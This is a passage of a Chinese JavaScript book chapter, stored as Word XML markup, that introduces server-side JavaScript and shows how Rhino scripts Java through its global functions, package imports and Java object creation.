      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="294"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>前面的章节已经详细介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心，我们即将开始本书的第二部分，该部分会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的原理，并涵盖庞杂的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>。可以说</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是基于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>的编程语言，因为绝大部分</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码是为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器而编写。但是作为一门高效和通用的语言，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>理所当然能用于其他编程工作。所以在过渡到服务端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>之前，我们先快速了解一下另外两种</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>嵌入。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>是基于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>解析器，实现了通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序访问整个</w:t>
      </w:r>
      <w:r>
        <w:t>Java API</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>12.1</w:t>
      </w:r>
      <w:r>
        <w:t>节将会介绍它。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>V8 JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解析器的一个特别版本，它在底层绑定了</w:t>
      </w:r>
      <w:r>
        <w:t>POSIX</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Unix</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，包括文件、进程、流和套接字等，并侧重于异步</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:t>、网络和</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节将会介绍它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章标题表明本章是关于</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Rhion</w:t>
      </w:r>
      <w:r>
        <w:t>常用于创建脚本服务器。但</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这个词也意味着</w:t>
      </w:r>
      <w:r>
        <w:t>“Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器之外的任何事情</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>程序能使用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Swing</w:t>
      </w:r>
      <w:r>
        <w:t>框架创建</w:t>
      </w:r>
      <w:r>
        <w:t>图形</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>上运行的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以像</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>脚本那样去操作文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本章非常简短，仅准备重点介绍在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器之外使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一些方式；不会尝试全面介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>，第三部分也不会包涵这里讨论的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>；并且不会详细介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>平台或</w:t>
      </w:r>
      <w:r>
        <w:t>POSIX API</w:t>
      </w:r>
      <w:r>
        <w:t>，接下来关于</w:t>
      </w:r>
      <w:r>
        <w:t>Rhion</w:t>
      </w:r>
      <w:r>
        <w:t>的章节假定读者有一定的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>经验，关于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的章节假定读者有一定的底层</w:t>
      </w:r>
      <w:r>
        <w:t>Unix API</w:t>
      </w:r>
      <w:r>
        <w:t>的经验。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="12_1_Yong_RhinoJiao_Ben_Hua_Java"/>
      <w:r>
        <w:t>12.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>是一种用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>编写的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器</w:t>
      </w:r>
      <w:r>
        <w:t>，其设计目标是借助于强大的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>平台</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>实现轻松编写</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>能自动完成</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>原生类型的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>原生类型之间的相互转换，因此</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>脚本可以设置、查询</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并调用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>开发的免费软件，可以从</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.mozilla.org/rhino/</w:t>
      </w:r>
      <w:r>
        <w:t>下载。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>1.7r2</w:t>
      </w:r>
      <w:r>
        <w:t>版本实现了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>，以及在</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的很多语言扩展。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>软件比较成熟，不会经常发布新版本。在写本章</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>1.7r3</w:t>
      </w:r>
      <w:r>
        <w:t>的预览版已出现在源码库中，它实现了</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的部分内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>打包为</w:t>
      </w:r>
      <w:r>
        <w:t>JAR</w:t>
      </w:r>
      <w:r>
        <w:t>文件发布，可以从使用下面这行命令开始探索之旅：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>java-jar rhino1_7R2/js.jar program.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果省略</w:t>
      </w:r>
      <w:r>
        <w:t>program.js</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>会开启一个交互的</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>界面，它对尝试简单或单行的程序比较有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>定义了少量重要的全局函数，不过它们都不是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的核心组成部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>特定于嵌入的全局函数：输入</w:t>
      </w:r>
      <w:r>
        <w:t>help()</w:t>
      </w:r>
      <w:r>
        <w:t>获取更多的</w:t>
      </w:r>
      <w:r>
        <w:t>rhino</w:t>
      </w:r>
      <w:r>
        <w:t>提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pri</w:t>
      </w:r>
      <w:r>
        <w:t>nt(x);//</w:t>
      </w:r>
      <w:r>
        <w:t>全局输出函数，将内容输出到控制台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>version(170);//</w:t>
      </w:r>
      <w:r>
        <w:t>告诉</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>JS 1.7</w:t>
      </w:r>
      <w:r>
        <w:t>的语言特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>load(filename,...);//</w:t>
      </w:r>
      <w:r>
        <w:t>加载并执行</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>readFile(file);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取文本文件，并以字符串的形式返回内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>readUrl(url);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的原文内容，并以字符串的形式返回内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>spawn(f);//</w:t>
      </w:r>
      <w:r>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>或者在一个新线程中加载执行文件</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>runCommand(cmd,[args...]);//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或多个命令行参</w:t>
      </w:r>
      <w:r>
        <w:t>数来运行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>quit()//</w:t>
      </w:r>
      <w:r>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>print()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：在本节我们将用它取代</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>会将</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>包和类表示成</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>Packages</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>包层次结构的根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Packages.any.package.name//</w:t>
      </w:r>
      <w:r>
        <w:t>任何来自</w:t>
      </w:r>
      <w:r>
        <w:t>Java CLASSPATH</w:t>
      </w:r>
      <w:r>
        <w:t>的包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>java.lang//</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Packages.java</w:t>
      </w:r>
      <w:r>
        <w:t>的短名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>javax.swing//javax</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Packages.javax</w:t>
      </w:r>
      <w:r>
        <w:t>的短名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>类：能像包的属性一样存取</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var System=java.lang.System;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var JFrame=javax.swing.JFrame;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>把包和类表示为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因此可以将它们赋值给变量从而得到相应的短名。如果愿意，也可以用更正式的方式导入它们：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ArrayList=java.util.ArrayList;//</w:t>
      </w:r>
      <w:r>
        <w:t>为类创建短名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.util.HashMap);//</w:t>
      </w:r>
      <w:r>
        <w:t>其等同于：</w:t>
      </w:r>
      <w:r>
        <w:t>var HashMap=java.util.HashMa</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>importPackage()</w:t>
      </w:r>
      <w:r>
        <w:t>导入包（惰性地）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不要导入</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r>
        <w:t>：太多的名字和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量有冲突</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importPackage(java.util);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importPackage(java.net);//</w:t>
      </w:r>
      <w:r>
        <w:t>另一技术：传入任意数量的类和包给</w:t>
      </w:r>
      <w:r>
        <w:t>JavaImporter()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并在</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句中使用它返回的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var guipkgs=JavaImporter(java.awt,java.awt.event,Packages.javax.swing);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>with(guipkg</w:t>
      </w:r>
      <w:r>
        <w:t>s){/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里定义</w:t>
      </w:r>
      <w:r>
        <w:t>Font</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ActionListener</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JFrame</w:t>
      </w:r>
      <w:r>
        <w:t>等类</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Java</w:t>
      </w:r>
      <w:r>
        <w:t>类能使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>进行实例化，就像</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类一样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>实例化</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var f=new java.io.File("/tmp/test");//</w:t>
      </w:r>
      <w:r>
        <w:t>我们随后将使用这些对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var out=new java.io.FileWriter(f);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符能用于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>对象和类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
